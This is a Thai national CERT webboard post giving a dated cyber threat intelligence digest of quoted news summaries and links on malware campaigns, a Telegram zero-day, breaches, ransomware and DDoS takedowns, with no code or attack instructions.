NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 23 July 2024

    Cyber Security News
    2
    1
    70
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย NCSA_THAICERT

      New Tooling

      • Shuffle Automation: Open-Source Security Automation Platform
        "Shuffle is an open-source automation platform designed by and for security professionals. While security operations are inherently complex, Shuffle simplifies the process. It’s designed to integrate with Managed Security Service Providers (MSSPs) and other service providers."
        https://www.helpnetsecurity.com/2024/07/22/shuffle-automation-open-source-security-automation-platform/
        https://github.com/Shuffle/Shuffle

      Malware

      • Fake Browser Updates Lead To BOINC Volunteer Computing Software
        "Beginning on July 4, 2024, Huntress observed new behaviors in conjunction with malware typically called SocGholish or FakeUpdates. This is a large malware group, with a number of new campaigns and similar malware emerging over the past couple of years. Huntress has written about SocGholish previously, and many of these same behaviors haven’t changed. The infections typically begin as a result of a user visiting a compromised website, which results in a fake browser update prompt to the user."
        https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
        https://thehackernews.com/2024/07/socgholish-malware-exploits-boinc.html
        https://securityaffairs.com/166030/malware/socgholish-used-deliver-asyncrat.html
      • Cursed Tapes: Exploiting The EvilVideo Vulnerability On Telegram For Android
        "ESET researchers discovered a zero-day exploit that targets Telegram for Android, which appeared for sale for an unspecified price in an underground forum post from June 6th, 2024. Using the exploit to abuse a vulnerability that we named EvilVideo, attackers could share malicious Android payloads via Telegram channels, groups, and chat, and make them appear as multimedia files."
        https://www.welivesecurity.com/en/eset-research/cursed-tapes-exploiting-evilvideo-vulnerability-telegram-android/
        https://therecord.media/telegram-zero-day-android-app-eset
        https://www.bleepingcomputer.com/news/security/telegram-zero-day-allowed-sending-malicious-android-apks-as-videos/
        https://hackread.com/telegram-android-vulnerability-evilvideo-malware-videos/
        https://securityaffairs.com/166042/hacking/evilvideo-telegram-android-zero-day.html
      • Threat Actors Use Telegram APIs For Harvesting Credentials
        "In recent weeks, there has been an increase in phishing attacks, conducted through messaging platforms like Telegram. Telegram is a widely used app that allows users to send messages, photos, videos, and other files online. It also provides APIs for developers to create custom bots and applications. Unfortunately, these APIs can also attract threat actors who use them for illicit purposes, such as stealing credentials."
        https://www.forcepoint.com/blog/insights/threat-actors-harvesting-credentials-telegram-api
      • Gambling Is No Game: DNS Links Between Chinese Organized Crime And Sports Sponsorships
        "This groundbreaking report unveils the discovery of a technology suite and its connection to Chinese organized crime, money laundering, and human trafficking throughout Southeast Asia. The technology suite is composed of software, Domain Name System (DNS) configurations, website hosting, payment mechanisms, mobile apps, and more—a full cybercrime supply chain. Tens of seemingly unrelated gambling brands that advertise by way of sponsorship deals with European sports teams use this technology."
        https://blogs.infoblox.com/threat-intelligence/gambling-is-no-game-dns-links-between-chinese-organized-crime-and-sports-sponsorships/
        https://insights.infoblox.com/resources-report/infoblox-report-vigorish-viper-a-venomous-bet
        https://thehackernews.com/2024/07/experts-uncover-chinese-cybercrime.html
        https://therecord.media/chinese-cybercrime-syndicate-gambling-football-europe
        https://hackread.com/chinese-vigorish-viper-dns-football-illegal-gambling/
      • PINEAPPLE And FLUXROOT Hacker Groups Abuse Google Cloud For Credential Phishing
        "A Latin America (LATAM)-based financially motivated actor codenamed FLUXROOT has been observed leveraging Google Cloud serverless projects to orchestrate credential phishing activity, highlighting the abuse of the cloud computing model for malicious purposes. "Serverless architectures are attractive to developers and enterprises for their flexibility, cost effectiveness, and ease of use," Google said in its biannual Threat Horizons Report [PDF] shared with The Hacker News."
        https://thehackernews.com/2024/07/pineapple-and-fluxroot-hacker-groups.html
        https://services.google.com/fh/files/misc/threat_horizons_report_h2_2024.pdf
      • From RA Group To RA World: Evolution Of a Ransomware Group
        "The ransomware group RA Group, now known as RA World, showed a noticeable uptick in their activity since March 2024. About 37% of all posts on their dark web leak site have appeared since March, suggesting this is an emerging group to watch. This article describes the tactics, techniques and procedures (TTPs) used by RA World."
        https://unit42.paloaltonetworks.com/ra-world-ransomware-group-updates-tool-set/

      Breaches/Hacks/Leaks

      • Greece’s Land Registry Agency Breached In Wave Of 400 Cyberattacks
        "The Land Registry agency in Greece has announced that it suffered a limited-scope data breach following a wave of 400 cyberattacks targeting its IT infrastructure over the last week. The agency said hackers managed to compromise employee terminals and steal 1.2 GB of data, corresponding to roughly 0.0006% of the total data held by the government organization. The stolen data reportedly does not contain any citizens' personal information but primarily consists of typical administrative documents, the exposure of which is not expected to impact the registry's operations."
        https://www.bleepingcomputer.com/news/security/greeces-land-registry-agency-breached-in-wave-of-400-cyberattacks/
      • Los Angeles Superior Court Shuts Down After Ransomware Attack
        "The largest trial court in the United States, the Superior Court of Los Angeles County, closed all 36 courthouse locations on Monday to restore systems affected by a Friday ransomware attack. The attack, which has not yet been claimed by a ransomware operation, affected the entire network of the Los Angeles Superior Court. This includes external systems like the MyJuryDuty Portal and its website and internal systems like the case management systems."
        https://www.bleepingcomputer.com/news/security/los-angeles-superior-court-shuts-down-after-ransomware-attack/
        https://therecord.media/la-county-system-ransomware-closed-monday
        https://hackread.com/ransomware-attack-la-county-courts-halt-inmate-transfer/
        https://www.securityweek.com/california-officials-say-largest-trial-court-in-us-victim-of-ransomware-attack/
        https://www.theregister.com/2024/07/22/ransomware_la_county_superior_court/
      • Safety Equipment Giant Cadre Holdings Hit By Cyberattack
        "Florida-based safety equipment giant Cadre Holdings on Friday disclosed a cyberattack that has impacted some of the company’s operations. Cadre provides safety and survivability products for first responders, federal agencies, outdoor recreation, and personal protection in over 100 countries. Its products include body armor, bomb squad equipment, duty gear, and nuclear safety solutions."
        https://www.securityweek.com/safety-equipment-giant-cadre-holdings-hit-by-cyberattack/

      General News

      • Under-Resourced Maintainers Pose Risk To Africa's Open Source Push
        "During a two-day conference at the United Nations in New York City last week, technologists and global policy makers expounded on the benefits that open source software (OSS) can provide to the world, particularly when it comes to delivering affordable technology to underserved nations in Africa and beyond. But to make the most of the OSS promise, security has to go hand in hand with app development."
        https://www.darkreading.com/application-security/under-resourced-maintainers-pose-risk-to-africas-open-source-push
      • Cross-Industry Standards For Data Provenance In AI
        "In this Help Net Security interview, Saira Jesani, Executive Director of the Data & Trust Alliance, discusses the role of data provenance in AI trustworthiness and its impact on AI models’ performance and reliability. Jesani highlights the collaborative process behind developing cross-industry metadata standards to address widespread data provenance challenges and ensure applicability across various sectors."
        https://www.helpnetsecurity.com/2024/07/22/saira-jesani-data-trust-alliance-data-provenance-standards/
      • NCA Infiltrates World's Most Prolific DDoS-For-Hire Service
        "The National Crime Agency has infiltrated a significant DDoS-for-hire service which has been responsible for tens of thousands of attacks every week across the globe. The disruption targeting digitalstress.su, a criminal marketplace offering DDos capabilities, was made in partnership with the Police Service of Northern Ireland. It comes after the PSNI arrested one of the site’s suspected controllers earlier this month."
        https://www.nationalcrimeagency.gov.uk/news/nca-infiltrates-world-s-most-prolific-ddos-for-hire-service
        https://www.bleepingcomputer.com/news/security/police-infiltrates-takes-down-digitalstress-ddos-for-hire-service/
        https://therecord.media/ddos-for-hire-site-digitalstress-takedown-arrest-uk-nca
        https://www.theregister.com/2024/07/22/ddos_for_hire_shutdown/
      • Spain Arrests Three For Using DDoSia Hacktivist Platform
        "The Spanish authorities have arrested three individuals for using DDoSia, a distributed denial of service platform operated by pro-Russian hacktivists, to conduct DDoS attacks against governments and organizations in NATO countries. The arrests were made in the suspects' homes in Seville, Huelva, and Manacor. The police also confiscated various computer equipment and documents of interest to be used in the ensuing investigations."
        https://www.bleepingcomputer.com/news/security/spain-arrests-three-for-using-ddosia-hacktivist-platform/
        https://therecord.media/spain-arrest-noname-russia-hackers
      • Swipe Right For Data Leaks: Dating Apps Expose Location, More
        "Apps like Tinder, Bumble, Grindr, Badoo, OKCupid, MeetMe, and Hinge all have API vulnerabilities that expose sensitive user data, and six allow a threat actor to pinpoint exactly where someone is."
        https://www.darkreading.com/application-security/swipe-right-for-data-leaks-dating-apps-expose-location-more
        https://lepoch.at/files/dating-apps-usesec24.pdf
      • Fragmented And Multiplied Cybercriminal Landscape, Warns New Europol Report
        "Today, Europol publishes the 10th edition of the Internet Organised Crime Threat Assessment (IOCTA), an in-depth assessment of the key developments, changes and emerging threats in cybercrime over the last year. The report highlights relevant trends in crime areas such cyber-attacks, child sexual exploitation and online and payment fraud schemes. It also provides an outlook of what can be expected in the near future, especially regarding new technologies, payment systems, AI, cryptocurrencies and illicit content online."
        https://www.europol.europa.eu/media-press/newsroom/news/fragmented-and-multiplied-cybercriminal-landscape-warns-new-europol-report
        http://www.europol.europa.eu/cms/sites/default/files/documents/IOCTA 2024 - EN_0.pdf
        https://www.infosecurity-magazine.com/news/ransomware-groups-fragment-rising/
        https://www.theregister.com/2024/07/22/europol_says_ransomware_takedowns_make/

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) a91f1f36-d5ba-42bf-84cb-44aa23a1fbf5-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post